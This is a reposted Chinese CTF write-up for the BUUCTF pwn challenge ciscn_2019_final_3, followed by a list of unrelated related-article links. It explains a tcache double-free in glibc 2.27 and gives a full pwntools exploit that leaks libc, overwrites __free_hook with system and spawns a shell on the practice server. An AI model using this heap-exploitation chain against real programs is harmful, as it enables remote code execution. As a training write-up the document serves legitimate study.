[BUUCTF]-PWN:ciscn_2019_final_3解析

2024-02-15 21:36
文章标签 buuctf 解析 2019 final pwn ciscn

本文主要是介绍[BUUCTF]-PWN:ciscn_2019_final_3解析,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

查看保护

RELRO保护为FULL,got表不可修改,只能修改hook表了

查看ida

这里的大致功能为alloc创建堆块(可填充内容)、free释放堆块(但是不清空指针)

值得注意的就是创建堆块大小不可以超过0x78(实际大小会对齐)

这里的libc版本要注意以下,它在题目中给了我们libc库,很巧妙的是这道题的版本选得很刁钻,只要稍微高一点的版本都用不了常规解法中的tcachebin的double free(版本是GLIBC 2.27-3ubuntu1),连ubuntu18.04的libc都不行,最好用题目给的。

完整exp:

from pwn import*
from LibcSearcher import*
context(log_level='debug')
p=process('./final3')
p=remote('node5.buuoj.cn',29058)def alloc(index,size,content):p.sendlineafter(b'choice >',str(1))p.sendlineafter(b'input the index',str(index))p.sendlineafter(b'input the size',str(size))p.sendafter(b'now you can write something',content)
def free(index):p.sendlineafter(b'choice >',str(2))p.sendlineafter(b'input the index',str(index))alloc(0,0x10,b'aaaa')
p.recvuntil(b'gift :')
chunk0=int(p.recv(14),16)
print(hex(chunk0))
alloc(1,0x70,p64(0))
free(0) #这就是这个版本的tcachebin可以进行的double free注意和fastbin的double free区分
free(0)
alloc(2,0x10,p64(chunk0-0x10))
alloc(3,0x10,p64(0))
alloc(4,0x10,p64(0)+p64(0xa1)) #修改chunk0的size为非fastbin的大小
alloc(5,0x78,p64(0))
for i in range(0,8): #连续free填充tcachebin,让堆块进入unsortedbin中free(0)
free(1) #因为释放堆块0让堆块1也处于空闲状态,所以打算利用chunk1泄露libc
alloc(6,0x10,p64(0)) #切割unsortedbin的堆块,因为tcachebin里没有类似大小的堆块,所以可以切割
alloc(7,0x70,b'\x00') #这里填充一个字节的\x00,因为mainarena+88的最后一个字节相对固定。
alloc(8,0x70,b'\x00') #所以不用担心覆盖最后一个字节会影响地址,到时候根据实际再减去一点就行
p.recvuntil(b'gift :')
mainarena88=int(p.recv(14),16)
mainarena=mainarena88-88 #这些地方是根据习惯去写的,实际可能不准,但最后的mallochook肯定是对的
mallochook=mainarena-0x18
libc=LibcSearcher('__malloc_hook',mallochook)
libcbase=mallochook-libc.dump('__malloc_hook')
freehook=libcbase+libc.dump('__free_hook')
system=libcbase+libc.dump('system')
alloc(9,0x50,p64(0))
free(9)
free(9)
alloc(10,0x50,p64(freehook)) #我尝试过用修改malloc来解题,但没试出来
alloc(11,0x50,b'/bin/sh')
payload=p64(system)
alloc(12,0x50,payload)
free(11)
p.interactive()

 这道题个人感觉调试很重要,在这篇文章中的很多地方都不能单纯地用理论去解释,最好还是自己去调试理解,而且这个题目的文件是一个c++编程,与常见的c编程文件更换libc不同,它还需要更换更多的东西,我会再写一篇文章来写更换libc的内容,并将文章链接附加到这篇文章里。

这篇关于[BUUCTF]-PWN:ciscn_2019_final_3解析的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/712595

相关文章

使用Jackson进行JSON生成与解析的新手指南

使用Jackson进行JSON生成与解析的新手指南

《使用Jackson进行JSON生成与解析的新手指南》这篇文章主要为大家详细介绍了如何使用Jackson进行JSON生成与解析处理,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 目录1. 核心依赖2. 基础用法2.1 对象转 jsON(序列化)2.2 JSON 转对象(反序列化)3.
阅读更多...
Springboot @Autowired和@Resource的区别解析

Springboot @Autowired和@Resource的区别解析

《Springboot@Autowired和@Resource的区别解析》@Resource是JDK提供的注解,只是Spring在实现上提供了这个注解的功能支持,本文给大家介绍Springboot@... 目录【一】定义【1】@Autowired【2】@Resource【二】区别【1】包含的属性不同【2】@
阅读更多...
SpringCloud动态配置注解@RefreshScope与@Component的深度解析

SpringCloud动态配置注解@RefreshScope与@Component的深度解析

《SpringCloud动态配置注解@RefreshScope与@Component的深度解析》在现代微服务架构中,动态配置管理是一个关键需求,本文将为大家介绍SpringCloud中相关的注解@Re... 目录引言1. @RefreshScope 的作用与原理1.1 什么是 @RefreshScope1.
阅读更多...
Java并发编程必备之Synchronized关键字深入解析

Java并发编程必备之Synchronized关键字深入解析

《Java并发编程必备之Synchronized关键字深入解析》本文我们深入探索了Java中的Synchronized关键字,包括其互斥性和可重入性的特性,文章详细介绍了Synchronized的三种... 目录一、前言二、Synchronized关键字2.1 Synchronized的特性1. 互斥2.
阅读更多...
Java的IO模型、Netty原理解析

Java的IO模型、Netty原理解析

《Java的IO模型、Netty原理解析》Java的I/O是以流的方式进行数据输入输出的,Java的类库涉及很多领域的IO内容:标准的输入输出,文件的操作、网络上的数据传输流、字符串流、对象流等,这篇... 目录1.什么是IO2.同步与异步、阻塞与非阻塞3.三种IO模型BIO(blocking I/O)NI
阅读更多...
Python 中的异步与同步深度解析(实践记录)

Python 中的异步与同步深度解析(实践记录)

《Python中的异步与同步深度解析(实践记录)》在Python编程世界里,异步和同步的概念是理解程序执行流程和性能优化的关键,这篇文章将带你深入了解它们的差异,以及阻塞和非阻塞的特性,同时通过实际... 目录python中的异步与同步:深度解析与实践异步与同步的定义异步同步阻塞与非阻塞的概念阻塞非阻塞同步
阅读更多...
Redis中高并发读写性能的深度解析与优化

Redis中高并发读写性能的深度解析与优化

《Redis中高并发读写性能的深度解析与优化》Redis作为一款高性能的内存数据库,广泛应用于缓存、消息队列、实时统计等场景,本文将深入探讨Redis的读写并发能力,感兴趣的小伙伴可以了解下... 目录引言一、Redis 并发能力概述1.1 Redis 的读写性能1.2 影响 Redis 并发能力的因素二、
阅读更多...
Spring MVC使用视图解析的问题解读

Spring MVC使用视图解析的问题解读

《SpringMVC使用视图解析的问题解读》:本文主要介绍SpringMVC使用视图解析的问题解读,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录Spring MVC使用视图解析1. 会使用视图解析的情况2. 不会使用视图解析的情况总结Spring MVC使用视图
阅读更多...
利用Python和C++解析gltf文件的示例详解

利用Python和C++解析gltf文件的示例详解

《利用Python和C++解析gltf文件的示例详解》gltf,全称是GLTransmissionFormat,是一种开放的3D文件格式,Python和C++是两个非常强大的工具,下面我们就来看看如何... 目录什么是gltf文件选择语言的原因安装必要的库解析gltf文件的步骤1. 读取gltf文件2. 提
阅读更多...
Java中的runnable 和 callable 区别解析

Java中的runnable 和 callable 区别解析

《Java中的runnable和callable区别解析》Runnable接口用于定义不需要返回结果的任务,而Callable接口可以返回结果并抛出异常,通常与Future结合使用,Runnab... 目录1. Runnable接口1.1 Runnable的定义1.2 Runnable的特点1.3 使用Ru
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2